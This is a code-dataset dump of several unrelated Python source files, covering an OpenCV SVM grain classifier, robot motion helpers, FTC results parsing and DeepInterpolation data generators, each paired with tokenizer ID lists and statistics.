content stringlengths 1 1.04M | input_ids listlengths 1 774k | ratio_char_token float64 0.38 22.9 | token_count int64 1 774k |
|---|---|---|---|
import matplotlib.pyplot as plt
from cv2 import (ml, imread, threshold, findContours, moments, contourArea, arcLength,
boundingRect, drawContours, cvtColor,
IMREAD_GRAYSCALE, TERM_CRITERIA_MAX_ITER, COLOR_GRAY2RGB)
from numpy import (array, matrix, ones, empty, delete, sqrt, pi,
vstack, hstack, concatenate, float32, int64)
from sklearn.metrics import accuracy_score, confusion_matrix, ConfusionMatrixDisplay
from PyQt5.QtWidgets import QDialog
from PyQt5.QtCore import QCoreApplication, QSize
from src.constants import RETRIEVAL_MODES, APPROXIMATION_MODES
from ..operation import Operation
from .svm_ui import SVMUI
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas
from matplotlib import use
use("Qt5Agg")
class SVM(QDialog, Operation, SVMUI):
    """The SVM class implements a support vector machine classification."""

    # Class labels map to the training images in update_training_data:
    # 1 = rice ("ryz"), 2 = lentils ("soczewica"), 3 = beans ("fasola").

    def __init__(self, parent):
        """
        Create a new dialog window to perform SVM classification.

        Get image data from :param:`parent`.

        :param parent: The image to classificate
        :type parent: :class:`image.Image`
        """
        super().__init__()
        self.init_ui(self)
        # Work on a copy so the source image is never mutated.
        self.img_data = parent.data.copy()
        self.current_img_data = None
        self.training_data = None
        self.training_shape = None
        self.training_labels = None
        self.svm = ml.SVM_create()
        self.svm_accuracy = None
        self.rbtn_show_confusion_matrix.clicked.connect(self.update_cm)
        # Train first, then classify; the UI labels built below reference the
        # training shape and accuracy computed by these calls.
        self.train_SVM()
        self.make_predictions()
        self.__retranslate_ui()
        self.update_img_preview()

    def __retranslate_ui(self):
        """Set the text and titles of the widgets."""
        _translate = QCoreApplication.translate
        _window_title = "SVM Classification"
        _svm_desc = "The SVM classifies objects belonging to the three classes: <b>rice, beans, lentils</b>"
        # training_shape is (examples, features) after the transpose in
        # update_training_data, hence shape[1] = features, shape[0] = examples.
        _training_data = f"The training data has {self.training_shape[1]} features (properties) " \
                         f"and {self.training_shape[0]} examples"
        _svm_accuracy = "Trained accuracy: " + str(self.svm_accuracy)
        # NOTE(review): make_predictions draws class 2 (lentils) in blue and
        # class 3 (beans) in red -- the opposite of this description.
        # Confirm which side is wrong before changing either.
        _objects_colors = "The objects classified as rice have green contours, " \
                          "beans have blue, and lentils have red ones"
        self.setWindowTitle(_window_title)
        self.label_svm_desc.setText(_translate(_window_title, _svm_desc))
        self.label_training_data.setText(_translate(_window_title, _training_data))
        self.label_svm_accuracy.setText(_translate(_window_title, _svm_accuracy))
        self.label_objects_colors.setText(_translate(_window_title, _objects_colors))

    def get_features(self, img_data):
        """Return vector of properties for all found objects in the image.

        :param img_data: grayscale image array
        :returns: (29, n_objects) array -- the image moments plus five shape
            descriptors, one column per detected contour
        """
        # Binarize with a fixed threshold of 127 before contour detection.
        _, img_data = threshold(img_data, 127, 255, 0)
        contours, _ = findContours(img_data, RETRIEVAL_MODES['List'], APPROXIMATION_MODES['Simple'])
        # 29 rows: 24 values returned by cv2.moments + 5 descriptors below.
        features = empty((29, 0))
        for contour in contours:
            obj_moments = moments(contour)
            moments_values = obj_moments.values()
            moments_values = array(list(moments_values)).flatten().reshape(-1, 1)
            area = contourArea(contour)
            perimeter = arcLength(contour, True)
            _, _, width, height = boundingRect(contour)
            aspect_ratio = float(width) / height
            rect_area = width * height
            # Fraction of the bounding rectangle covered by the object.
            extent = float(area) / rect_area
            # Diameter of the circle whose area equals the contour area.
            equivalent_diameter = sqrt(4 * area / pi)
            feature_vector = array([area, perimeter, aspect_ratio, extent, equivalent_diameter]).reshape(-1, 1)
            feature_vector = vstack((moments_values, feature_vector))
            # One column per detected object.
            features = hstack((features, feature_vector))
        return features

    def get_labels(self, input_features, label_class=1):
        """Return the vector of labeled properties.

        :param input_features: (n_features, n_objects) feature matrix
        :param label_class: numeric class assigned to every object column
        :returns: (n_objects, 1) array filled with label_class
        """
        shape = input_features.shape
        out = ones((shape[1], 1))
        return out * label_class

    def update_training_data(self):
        """Calculate properties and labels of training data."""
        img = imread('icons/SVM_train_data/train_ryz.jpg', IMREAD_GRAYSCALE)
        features1 = self.get_features(img)
        # Drop the last detected contour of each training image --
        # presumably an image-border/whole-image artifact; TODO confirm.
        features1 = delete(features1, features1.shape[1] - 1, axis=1)
        img = imread('icons/SVM_train_data/train_soczewica.jpg', IMREAD_GRAYSCALE)
        features2 = self.get_features(img)
        features2 = delete(features2, features2.shape[1] - 1, axis=1)
        img = imread('icons/SVM_train_data/train_fasola.jpg', IMREAD_GRAYSCALE)
        features3 = self.get_features(img)
        features3 = delete(features3, features3.shape[1] - 1, axis=1)
        # Stack all feature columns, then transpose to (examples, features) --
        # the ROW_SAMPLE layout expected by cv2's SVM.
        self.training_data = float32(
            concatenate((features1, concatenate((features2, features3), axis=1)), axis=1).transpose()
        )
        self.training_shape = self.training_data.shape
        label1 = self.get_labels(features1, 1)
        label2 = self.get_labels(features2, 2)
        label3 = self.get_labels(features3, 3)
        self.training_labels = int64(concatenate((label1, concatenate((label2, label3)))))

    def train_SVM(self):
        """Train the SVM on calculated training data."""
        self.update_training_data()
        self.svm.setType(ml.SVM_C_SVC)
        self.svm.setKernel(ml.SVM_LINEAR)
        # Stop after at most 1000 iterations (epsilon 1e-6).
        self.svm.setTermCriteria((TERM_CRITERIA_MAX_ITER, 1000, 1e-6))
        self.svm.train(self.training_data, ml.ROW_SAMPLE, self.training_labels)
        self.update_svm_accuracy()

    def update_svm_accuracy(self):
        """Calculate SVM accuracy and confusion matrix."""
        # Accuracy is measured on the training set itself (no held-out split),
        # hence the "Trained accuracy" wording in the UI.
        prediction = self.svm.predict(self.training_data)[1]
        self.svm_accuracy = accuracy_score(self.training_labels, prediction)
        # Display labels follow the numeric class order 1, 2, 3.
        self.cm_display = ConfusionMatrixDisplay(confusion_matrix(self.training_labels, prediction),
                                                 display_labels=['rice', 'lentils', 'beans'])
        self.cm_display.plot()
        # Embed the current matplotlib figure as a Qt canvas; it starts
        # hidden and is toggled by update_cm.
        self.cm_canvas = FigureCanvas(plt.gcf())
        self.layout_preview.addWidget(self.cm_canvas)
        self.cm_canvas.draw()
        self.cm_canvas.setVisible(False)

    def make_predictions(self):
        """Predict object classification."""
        img_data = self.img_data.copy()
        features = self.get_features(img_data)
        _, img_data = threshold(img_data, 127, 255, 0)
        # Contours are recomputed with the 'None' approximation mode (full
        # point lists) for drawing, whereas the features used 'Simple'.
        contours, _ = findContours(img_data, RETRIEVAL_MODES['List'], APPROXIMATION_MODES['None'])
        img_data = cvtColor(img_data, COLOR_GRAY2RGB)
        for i in range(len(contours)):
            # Classify each object from its feature column, transposed to the
            # (1, n_features) row-sample shape the SVM expects.
            feature_predict = float32(features[:, i].reshape(-1, 1).transpose())
            response = self.svm.predict(feature_predict)[1]
            contour = contours[i]
            # Contour colors (image is RGB after cvtColor): 1 -> green,
            # 2 -> blue, 3 -> red, anything else -> white.
            # NOTE(review): the UI text in __retranslate_ui claims beans are
            # blue and lentils red -- the opposite of classes 2/3 here;
            # confirm which side is wrong.
            if response == 1:
                drawContours(img_data, [contour], 0, (0, 255, 0), 3)
            elif response == 2:
                drawContours(img_data, [contour], 0, (0, 0, 255), 3)
            elif response == 3:
                drawContours(img_data, [contour], 0, (255, 0, 0), 3)
            else:
                drawContours(img_data, [contour], 0, (255, 255, 255), 3)
        self.current_img_data = img_data

    def update_cm(self):
        """Update confusion matrix canvas visibility whenever :attr:`rbtn_show_confusion_matrix` clicked."""
        if self.rbtn_show_confusion_matrix.isChecked():
            # Show the matrix and widen the dialog to make room for it.
            self.cm_canvas.setVisible(True)
            self.resize(self.layout.sizeHint() + QSize(self.cm_canvas.size().width(), 0))
        else:
            # Hide the canvas and shrink the dialog back.
            self.cm_canvas.setVisible(False)
            self.resize(self.layout.sizeHint() - QSize(self.cm_canvas.size().width(), 0))
            self.adjustSize()
| [
11748,
2603,
29487,
8019,
13,
9078,
29487,
355,
458,
83,
198,
198,
6738,
269,
85,
17,
1330,
357,
4029,
11,
545,
961,
11,
11387,
11,
1064,
4264,
4662,
11,
7188,
11,
542,
454,
30547,
11,
10389,
24539,
11,
198,
220,
220,
220,
220,
22... | 2.27907 | 3,397 |
from collections import deque
| [
6738,
17268,
1330,
390,
4188,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220
] | 1.8 | 30 |
import argparse
import asyncio
import json
import math
import random
import signal
import time
from datetime import datetime, timedelta
#from netifaces import interfaces, ifaddresses, AF_INET
import socket
import traceback
import configChecker
import filecmp
import shutil
import sys
import simpleDali
# #For Testing
# productionDirectory="./ConfigFiles"
# prepDir=productionDirectory + "/ConfigFileEdit"
# archiveDir=productionDirectory + "/ConfigFileArchive"
# deployDir=productionDirectory + "/Run/ConfigFile"
# For Production Run
# Directory layout of the deployment pipeline: config files are edited in
# prepDir, archived to archiveDir, and picked up by the run from deployDir.
productionDirectory="/home/geo/Production"
prepDir=productionDirectory + "/ConfigFileEdit"
archiveDir=productionDirectory + "/ConfigFileArchive"
deployDir=productionDirectory + "/Run/ConfigFile"

if __name__ == "__main__":
    # execute only if run as a script
    parser = argparse.ArgumentParser()
    parser.add_argument("-t",
                        dest="tokenFile",
                        type=argparse.FileType('r'),
                        help="tokenfile, encoded on first line")
    parser.add_argument("-i",
                        dest="interval",
                        type=int,
                        default=60,
                        help="send time interval in seconds")
    args = parser.parse_args()
    # NOTE(review): SendConfig and handleSignal are not defined in this
    # chunk -- presumably defined earlier in the file; verify before running.
    sender = SendConfig(args.interval, args.tokenFile)
    # Shut down cleanly on Ctrl-C / SIGTERM.
    signal.signal(signal.SIGINT, handleSignal)
    signal.signal(signal.SIGTERM, handleSignal)
    sender.run()
| [
11748,
1822,
29572,
198,
11748,
30351,
952,
198,
11748,
33918,
198,
11748,
10688,
198,
11748,
4738,
198,
11748,
6737,
198,
11748,
640,
198,
6738,
4818,
8079,
1330,
4818,
8079,
11,
28805,
12514,
198,
2,
6738,
2010,
361,
2114,
1330,
20314,
... | 2.600726 | 551 |
#!/usr/bin/env python
# encoding: utf-8
"""
util.py
Created by Ronak Shah on April 12, 2018.
Copyright (c) 2018 Northwell Health. All rights reserved.
"""
import json
import logging
import os
import sys
# Path of the JSON resource configuration; overridable through the
# PIE_RESOURCE_CONFIG environment variable.
RESOURCE_FILE = os.getenv('PIE_RESOURCE_CONFIG', "pie_resources.json")
JSON_CONFIG = json.load(open(RESOURCE_FILE))

# Convenience views over the individual configuration sections.
programs = JSON_CONFIG['programs']
genomes = JSON_CONFIG['genomes']
chr1_fingerprints = JSON_CONFIG['chr1_fingerprints']
keys = JSON_CONFIG['keys']
targets = JSON_CONFIG['targets']
config = JSON_CONFIG['config']

# Module-level 'pie' logger writing INFO-and-above records to stdout.
FORMAT = '%(asctime)-15s %(funcName)-8s %(levelname)s %(message)s'
OUT_HANDLAR = logging.StreamHandler(sys.stdout)
OUT_HANDLAR.setFormatter(logging.Formatter(FORMAT))
OUT_HANDLAR.setLevel(logging.INFO)
LOGGER = logging.getLogger('pie')
LOGGER.addHandler(OUT_HANDLAR)
LOGGER.setLevel(logging.INFO)
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
2,
21004,
25,
3384,
69,
12,
23,
198,
37811,
198,
22602,
13,
9078,
198,
198,
41972,
416,
6575,
461,
18381,
319,
3035,
1105,
11,
2864,
13,
198,
15269,
357,
66,
8,
2864,
2258,
4053,
3... | 2.658147 | 313 |
import json
import cherrypy
import logging
from saml2 import BINDING_HTTP_POST
from saml2 import BINDING_HTTP_REDIRECT
from ventcat import conv_response, as_unicode
from ventcat import UnSupported
from ventcat.acs import ACS
from ventcat.response import Response, make_cookie
from ventcat.sso import SSO
logger = logging.getLogger(__name__)

# Map short binding names to the SAML2 HTTP binding constants.
BINDING_MAP = {'post': BINDING_HTTP_POST, 'redirect': BINDING_HTTP_REDIRECT}
| [
11748,
33918,
198,
198,
11748,
23612,
9078,
198,
11748,
18931,
198,
198,
6738,
6072,
75,
17,
1330,
347,
12115,
2751,
62,
40717,
62,
32782,
198,
6738,
6072,
75,
17,
1330,
347,
12115,
2751,
62,
40717,
62,
22083,
40,
23988,
198,
198,
673... | 3.028571 | 140 |
# Version 3.0 - 2021 September 10
# work for both Mac, Windows, Linux
# use clear() for clearing terminal
# Method 1
# from clearterminal import * -----> clear()
# Method 2
# import clearterminal -----> clearterminal.clear()
import os
import platform
# Resolve the platform-specific shell command used to clear the terminal.
# platform.system() returns 'Darwin' (macOS), 'Linux' or 'Windows'.
platform = platform.system()  # NB: rebinds the module name to a string

if platform == 'Windows':  # Windows console
    text = 'cls'
else:
    # Unix-like systems: macOS reports 'Darwin', Linux reports 'Linux'.
    # BUG FIX: the original only matched 'Darwin', so `text` stayed
    # undefined on Linux even though the module header promises Linux
    # support (and clear() would then fail with a NameError).
    text = "clear"

if __name__ == '__main__':
    input('''This is the terminal output
This is the terminal output
This is the terminal output
This is the terminal output
Press Enter to excute the clear() function for the terminal
from clearterminal import * -----> clear()
import clearterminal -----> clearterminal.clear()''')
    # NOTE(review): clear() is not defined in this chunk -- presumably
    # defined elsewhere in the module (likely wrapping os.system(text)).
    clear()
| [
2,
10628,
513,
13,
15,
532,
33448,
2693,
838,
198,
198,
2,
670,
329,
1111,
4100,
11,
3964,
11,
7020,
198,
2,
779,
1598,
3419,
329,
17304,
12094,
198,
2,
11789,
352,
198,
2,
422,
1598,
23705,
282,
1330,
1635,
13498,
3784,
1598,
341... | 3.455399 | 213 |
# -*- coding: utf-8 -*-
# Import the reverse lookup function
from django.core.urlresolvers import reverse
# view imports
from django.views.generic import DetailView
from django.views.generic import RedirectView
from django.views.generic import UpdateView
from django.views.generic import ListView
# Will be used for logged in and logged out messages
from django.contrib import messages
from django.contrib.auth.signals import user_logged_in, user_logged_out
# Only authenticated users can access views using this.
from braces.views import LoginRequiredMixin
# Import the form from users/forms.py
from .forms import UserUpdateForm
# Import the customized User model
from .models import User
# Attach flash-message handlers to Django's auth signals so users see a
# message on login/logout.
# NOTE(review): logged_in_message / logged_out_message are not defined in
# this chunk -- presumably defined earlier in the file; verify.
user_logged_in.connect(logged_in_message)
user_logged_out.connect(logged_out_message)
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
2,
17267,
262,
9575,
35847,
2163,
198,
6738,
42625,
14208,
13,
7295,
13,
6371,
411,
349,
690,
1330,
9575,
198,
198,
2,
1570,
17944,
198,
6738,
42625,
14208,
13,
33571,
... | 3.49115 | 226 |
from should_be import core as sc
import unittest
| [
6738,
815,
62,
1350,
1330,
4755,
355,
629,
198,
11748,
555,
715,
395,
628,
198
] | 3.4 | 15 |
#!/usr/bin/env python
### IMPORTS
#
# `moveit_commander` namespace allows Python MoveIt interfaces.
# Includes a `MoveGroupCommander`_, `PlanningSceneInterface`_, and `RobotCommander`_ class
#
# Additional imports allow used for support, ROS messages, and etc.
import sys
import copy
import rospy
import moveit_commander
import moveit_msgs.msg
import geometry_msgs.msg
from math import pi, radians
from std_msgs.msg import String
from moveit_commander.conversions import pose_to_list
from motoman_msgs.srv import ReadSingleIO, WriteSingleIO
## Quaternion Tools
from tf.transformations import euler_from_quaternion, quaternion_from_euler
## Maze Runner Specific
import csv
#####################################################
## SUPPORT CLASSES AND FUNCTIONS
##
def all_close(goal, actual, tolerance):
"""
Convenience method for testing if a list of values are within a tolerance of their counterparts in another list
@param: goal A list of floats, a Pose or a PoseStamped
@param: actual A list of floats, a Pose or a PoseStamped
@param: tolerance A float
@returns: bool
"""
all_equal = True
if type(goal) is list:
for index in range(len(goal)):
if abs(actual[index] - goal[index]) > tolerance:
return False
elif type(goal) is geometry_msgs.msg.PoseStamped:
return all_close(goal.pose, actual.pose, tolerance)
elif type(goal) is geometry_msgs.msg.Pose:
return all_close(pose_to_list(goal), pose_to_list(actual), tolerance)
return True
class moveManipulator(object):
"""moveManipulator Class""" | [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
198,
21017,
30023,
33002,
198,
2,
198,
2,
4600,
21084,
270,
62,
9503,
4066,
63,
25745,
3578,
11361,
10028,
1026,
20314,
13,
198,
2,
29581,
257,
4600,
21774,
13247,
6935,
4066,
63,
62,
... | 3.146586 | 498 |
from random import random
from hk_common import *
from hk_sp import *
from test_code_common import *
from test_code_eps import *
from test_code_aocs import *
from test_code_obc import *
from test_code_st import *
from test_code_sp import *
from test_code_pcom import *
from test_code_scom import *
from client.kaitai.main_kaitai import *
# Build a housekeeping ICP packet and dump it as one uppercase hex string.
hk_packet = generate_icp()
for byte in hk_packet:
    print('{:02x}'.format(byte).upper(), end="")
print()

# Re-parse the packet with the Kaitai-generated parser and spot-check fields.
target = Main.from_bytes(hk_packet)
# NOTE(review): wrapping each value in {...} prints it as a one-element set;
# presumably plain print(value) was intended -- confirm.
print({target.common_data.uptime})
print({target.spec_data.obc.fmc_mram_temp})
print({target.spec_data.aocs.sun_y_intensity_loc4})
| [
6738,
4738,
1330,
4738,
198,
198,
6738,
289,
74,
62,
11321,
1330,
1635,
198,
6738,
289,
74,
62,
2777,
1330,
1635,
198,
198,
6738,
1332,
62,
8189,
62,
11321,
1330,
1635,
198,
6738,
1332,
62,
8189,
62,
25386,
1330,
1635,
198,
6738,
13... | 2.638298 | 235 |
##@package daysselector
# @author Sebastien MATHIEU
from abc import ABCMeta, abstractmethod
## Abstract class of a day selector.
| [
2235,
31,
26495,
1528,
19738,
273,
198,
2,
2488,
9800,
22787,
2013,
337,
12599,
10008,
52,
198,
198,
6738,
450,
66,
1330,
9738,
48526,
11,
12531,
24396,
628,
198,
2235,
27741,
1398,
286,
257,
1110,
31870,
13,
198
] | 3.473684 | 38 |
from trex.stl.api import *
| [
6738,
2054,
87,
13,
301,
75,
13,
15042,
1330,
1635,
628
] | 2.545455 | 11 |
import logging
from models import Event, Ranking, Award, Match, MatchScore
from bs4 import BeautifulSoup
from db.orm import orm
class ResultsPageHelper:
"""Helper methods to parse the output from FTC Live Scoring Software pages"""
res_map = {"R": "red", "B": "blue", "T": "tie"}
@classmethod
@classmethod
@classmethod
@classmethod
@classmethod
def load_rankings(cls, table, matches, has_hs=True):
    """Parse a rankings HTML table into Ranking model objects.

    has_hs=False is necessary for rly old data (tables without the
    high-score column; the remaining column offsets shift by one).

    :param table: BeautifulSoup element of the rankings table
    :param matches: nested list of match objects; used for the event key and
        for computing per-team records and high scores
    :param has_hs: whether the table contains a high-score column
    :returns: list of Ranking objects, or None for an empty match table
    """
    try:
        event_key = matches[0][0].event_key
    except IndexError:
        logging.warning("can't load rankings on zero length match table!")
        return
    # Per-team high scores and (wins, losses, ties) records derived from the
    # match list. NOTE(review): highscores_wlt is not visible in this chunk.
    high_scores, wlt = cls.highscores_wlt(matches)
    ret = []
    #first = True
    for tr in table.find_all("tr"):
        td_tags = list(tr.find_all("td"))
        if not td_tags:
            # Header rows contain <th> only; skip them.
            continue
        td = [td.get_text() for td in td_tags]
        # Column 1 holds the team number; keys look like "ftc1234".
        tkey = "ftc" + td[1]
        twlt = wlt[tkey]
        if not has_hs:
            # Old format: no high-score column, so take it from match data.
            r = Ranking(event_key=event_key, team_key=tkey, rank=int(td[0]), qp_rp=int(td[3]), rp_tbp=int(td[4]),
                        high_score=high_scores.get(tkey, 0),
                        wins=twlt[0], losses=twlt[1], ties=twlt[2], dqed=0, played=int(td[5]))
        else:
            r = Ranking(event_key=event_key, team_key=tkey, rank=int(td[0]), qp_rp=int(td[3]), rp_tbp=int(td[4]),
                        high_score=int(td[5]),
                        wins=twlt[0], losses=twlt[1], ties=twlt[2], dqed=0, played=int(td[6]))
        ret.append(r)
    return ret
@classmethod
| [
11748,
18931,
198,
6738,
4981,
1330,
8558,
11,
45407,
11,
11289,
11,
13225,
11,
13225,
26595,
198,
6738,
275,
82,
19,
1330,
23762,
50,
10486,
198,
6738,
20613,
13,
579,
1330,
393,
76,
198,
198,
4871,
15691,
9876,
47429,
25,
198,
220,
... | 1.934407 | 869 |
# Class to generate data for training
import numpy as np
import json
import h5py
import os
import tensorflow.keras as keras
from deepinterpolation.generic import JsonLoader
import tifffile
import nibabel as nib
from scipy.io import wavfile
import s3fs
class DeepGenerator(keras.utils.Sequence):
    """
    This class instantiante the basic Generator Sequence object from which all Deep Interpolation generator should be generated.

    Parameters:
    json_path: a path to the json file used to parametrize the generator

    Returns:
    None
    """
    # NOTE(review): __init__ and __getitem__ are not visible in this chunk;
    # the methods below rely on them (and on local_mean / local_std
    # attributes) being provided elsewhere -- verify against the full file.

    def get_input_size(self):
        """
        This function returns the input size of the generator, excluding the batching dimension

        Parameters:
        None

        Returns:
        tuple: list of integer size of input array, excluding the batching dimension
        """
        # Fetch one batch and drop the leading batch axis.
        local_obj = self.__getitem__(0)[0]
        return local_obj.shape[1:]

    def get_output_size(self):
        """
        This function returns the output size of the generator, excluding the batching dimension

        Parameters:
        None

        Returns:
        tuple: list of integer size of output array, excluding the batching dimension
        """
        local_obj = self.__getitem__(0)[1]
        return local_obj.shape[1:]

    def __get_norm_parameters__(self, idx):
        """
        This function returns the normalization parameters of the generator. This can potentially be different for each data sample

        Parameters:
        idx index of the sample

        Returns:
        local_mean
        local_std
        """
        # Base implementation: one global mean/std for every sample.
        local_mean = self.local_mean
        local_std = self.local_std
        return local_mean, local_std
class OnePGenerator(DeepGenerator):
    """
    This generator deliver data provided from an hdf5 file made
    from one photon miniscope data.

    Parameters:
    str: json_path: path to the json parameter file

    Returns:
    None
    """
    # NOTE(review): __init__ is not visible in this chunk; the attributes
    # used below (list_samples, batch_size, movie_size, pre_post_frame,
    # local_raw_data, local_mean, local_std) are presumably set there.

    def __len__(self):
        "Denotes the total number of batches"
        return int(np.floor(float(len(self.list_samples)) / self.batch_size))

    def __data_generation__(self, index_frame):
        "Generates data containing batch_size samples"
        # local_raw_data = h5py.File(self.raw_data_file, 'r')['1']

        # Input holds the surrounding frames as channels; output is the
        # single target frame.
        input_full = np.zeros(
            [1, self.movie_size[1], self.movie_size[2], self.pre_post_frame * 2]
        )
        output_full = np.zeros([1, self.movie_size[1], self.movie_size[2], 1])

        # Frames around the target, excluding the target itself.
        input_index = np.arange(
            index_frame - self.pre_post_frame, index_frame + self.pre_post_frame + 1
        )
        input_index = input_index[input_index != index_frame]

        data_img_input = self.local_raw_data[input_index, :, :]
        data_img_output = self.local_raw_data[index_frame, :, :]

        # Reorder (frame, y, x) -> (y, x, frame) so frames become channels.
        data_img_input = np.swapaxes(data_img_input, 1, 2)
        data_img_input = np.swapaxes(data_img_input, 0, 2)

        img_in_shape = data_img_input.shape
        img_out_shape = data_img_output.shape

        # z-score both tensors with the precomputed statistics.
        data_img_input = (
            data_img_input.astype("float") - self.local_mean
        ) / self.local_std
        data_img_output = (
            data_img_output.astype("float") - self.local_mean
        ) / self.local_std

        input_full[0, : img_in_shape[0], : img_in_shape[1], :] = data_img_input
        output_full[0, : img_out_shape[0], : img_out_shape[1], 0] = data_img_output

        return input_full, output_full
class CollectorGenerator(DeepGenerator):
    """Generator of generators, used to train across multiple files.

    All wrapped generators must have identical batch size and input/output
    sizes, but they may differ in length.
    """

    def __len__(self):
        """Denotes the total number of batches, summed over all generators."""
        return sum(gen.__len__() for gen in self.generator_list)
class EphysGenerator(DeepGenerator):
    "Generates data for Keras"
    # Reads flat int16 electrophysiology traces from a binary file and yields
    # (surrounding frames, center frame) pairs for interpolation training.
    # NOTE(review): __getitem__ is not visible in this chunk -- presumably
    # provided by DeepGenerator or stripped from this view; verify.

    def __init__(self, json_path):
        "Initialization"
        super().__init__(json_path)

        self.raw_data_file = self.json_data["train_path"]
        self.batch_size = self.json_data["batch_size"]
        # Frames taken on each side of the target, and how many immediate
        # neighbors to omit around it.
        self.pre_post_frame = self.json_data["pre_post_frame"]
        self.pre_post_omission = self.json_data["pre_post_omission"]
        self.start_frame = self.json_data["start_frame"]
        self.steps_per_epoch = self.json_data["steps_per_epoch"]

        # This is compatible with negative frames
        self.end_frame = self.json_data["end_frame"]

        #self.nb_probes = 384
        self.nb_probes = self.json_data["nb_probes"] # modified by sk 2020/11/20

        # Flat int16 memmap; reshaped further below once the per-frame
        # channel count is known.
        self.raw_data = np.memmap(self.raw_data_file, dtype="int16")

        if self.end_frame < 0:
            # Negative end_frame counts back from the end of the recording.
            self.img_per_movie = (
                int(self.raw_data.size / self.nb_probes)
                + 1
                + self.end_frame
                - self.start_frame
                - self.pre_post_frame
                - self.pre_post_omission
            )
        elif int(self.raw_data.size / self.nb_probes) < self.end_frame:
            # end_frame beyond the recording: clamp to what is available.
            self.img_per_movie = (
                int(self.raw_data.size / self.nb_probes)
                - self.start_frame
                - self.pre_post_frame
                - self.pre_post_omission
            )
        else:
            self.img_per_movie = self.end_frame + 1 - self.start_frame

        self.total_frame_per_movie = int(self.raw_data.size / self.nb_probes)

        # Leading samples used to estimate the normalization statistics.
        average_nb_samples = 200000

        # Channels arranged as two staggered columns: (frames, rows, 2).
        shape = (self.total_frame_per_movie, int(self.nb_probes / 2), 2)

        # load it with the correct shape
        self.raw_data = np.memmap(self.raw_data_file, dtype="int16", shape=shape)

        # Older reshape code, to remove when stable
        # Reshape in number of traces
        # self.raw_data = np.reshape(self.raw_data, (self.total_frame_per_movie,
        # self.nb_probes))
        # Reshape following probes location
        # self.raw_data = np.reshape(self.raw_data, (self.total_frame_per_movie
        # int(self.nb_probes/2), 2)

        local_data = self.raw_data[0:average_nb_samples, :, :].flatten()
        local_data = local_data.astype("float32")

        # Recording-wide mean/std used to z-score every sample.
        self.local_mean = np.mean(local_data)
        self.local_std = np.std(local_data)

        self.epoch_index = 0

        self.list_samples = np.arange(
            self.start_frame, self.start_frame + self.img_per_movie
        )

        if "randomize" in self.json_data.keys():
            if self.json_data["randomize"] == 1:
                np.random.shuffle(self.list_samples)

    def __len__(self):
        "Denotes the total number of batches"
        return int(np.floor(float(len(self.list_samples)) / self.batch_size))

    def __data_generation__(self, index_frame):
        "Generates data containing batch_size samples"
        # We reorganize to follow true geometry of probe for convolution

        input_full = np.zeros(
            [1, self.nb_probes, 2, self.pre_post_frame * 2], dtype="float32"
        )
        output_full = np.zeros([1, self.nb_probes, 2, 1], dtype="float32")

        # Candidate input frames around the target...
        input_index = np.arange(
            index_frame - self.pre_post_frame - self.pre_post_omission,
            index_frame + self.pre_post_frame + self.pre_post_omission + 1,
        )
        # ...excluding the target frame itself and the omission window on
        # both sides.
        input_index = input_index[input_index != index_frame]

        for index_padding in np.arange(self.pre_post_omission + 1):
            input_index = input_index[input_index != index_frame - index_padding]
            input_index = input_index[input_index != index_frame + index_padding]

        data_img_input = self.raw_data[input_index, :, :]
        data_img_output = self.raw_data[index_frame, :, :]

        # Reorder (frame, row, col) -> (row, col, frame): frames -> channels.
        data_img_input = np.swapaxes(data_img_input, 1, 2)
        data_img_input = np.swapaxes(data_img_input, 0, 2)

        img_in_shape = data_img_input.shape

        # z-score with the recording-wide statistics estimated in __init__.
        data_img_input = (
            data_img_input.astype("float32") - self.local_mean
        ) / self.local_std
        data_img_output = (
            data_img_output.astype("float32") - self.local_mean
        ) / self.local_std

        # alternating filling with zeros padding
        # Even output rows take column 0, odd rows take column 1, mirroring
        # the staggered two-column layout of the probe sites.
        even = np.arange(0, self.nb_probes, 2)
        odd = even + 1

        input_full[0, even, 0, :] = data_img_input[:, 0, :]
        input_full[0, odd, 1, :] = data_img_input[:, 1, :]

        output_full[0, even, 0, 0] = data_img_output[:, 0]
        output_full[0, odd, 1, 0] = data_img_output[:, 1]

        return input_full, output_full
class SingleTifGenerator(DeepGenerator):
    "Generates data for Keras"
    # Serves interpolation samples from a single multi-page TIFF movie loaded
    # fully into memory.
    # NOTE(review): __getitem__ is not visible in this chunk -- presumably
    # provided by DeepGenerator or stripped from this view; verify.

    def __init__(self, json_path):
        "Initialization"
        super().__init__(json_path)

        self.raw_data_file = self.json_data["train_path"]
        self.batch_size = self.json_data["batch_size"]
        # Frames taken on each side of the target, and how many immediate
        # neighbors to omit around it.
        self.pre_post_frame = self.json_data["pre_post_frame"]
        self.pre_post_omission = self.json_data["pre_post_omission"]
        self.start_frame = self.json_data["start_frame"]

        if "randomize" in self.json_data.keys():
            self.randomize = self.json_data["randomize"]
        else:
            self.randomize = 1

        # This is compatible with negative frames
        self.end_frame = self.json_data["end_frame"]

        # The whole movie is materialized in memory.
        with tifffile.TiffFile(self.raw_data_file) as tif:
            self.raw_data = tif.asarray()

        self.total_frame_per_movie = self.raw_data.shape[0]

        if self.end_frame < 0:
            # Negative end_frame counts back from the end of the movie.
            self.img_per_movie = (
                self.total_frame_per_movie + 1 + self.end_frame - self.start_frame
            )
        elif self.total_frame_per_movie < self.end_frame:
            self.img_per_movie = self.total_frame_per_movie + 1 - self.start_frame
        else:
            self.img_per_movie = self.end_frame + 1 - self.start_frame

        # Normalization statistics estimated from the first frames only.
        average_nb_samples = 1000

        local_data = self.raw_data[0:average_nb_samples, :, :].flatten()
        local_data = local_data.astype("float32")
        self.local_mean = np.mean(local_data)
        self.local_std = np.std(local_data)

        # Keep a margin at both ends so every sample has a full neighborhood.
        self.list_samples = np.arange(
            self.pre_post_frame + self.pre_post_omission + self.start_frame,
            self.start_frame
            + self.img_per_movie
            - self.pre_post_frame
            - self.pre_post_omission,
        )

        if self.randomize:
            np.random.shuffle(self.list_samples)

    def __len__(self):
        "Denotes the total number of batches"
        return int(np.floor(float(len(self.list_samples)) / self.batch_size))

    def __data_generation__(self, index_frame):
        # X : (n_samples, *dim, n_channels)
        "Generates data containing batch_size samples"
        input_full = np.zeros(
            [
                1,
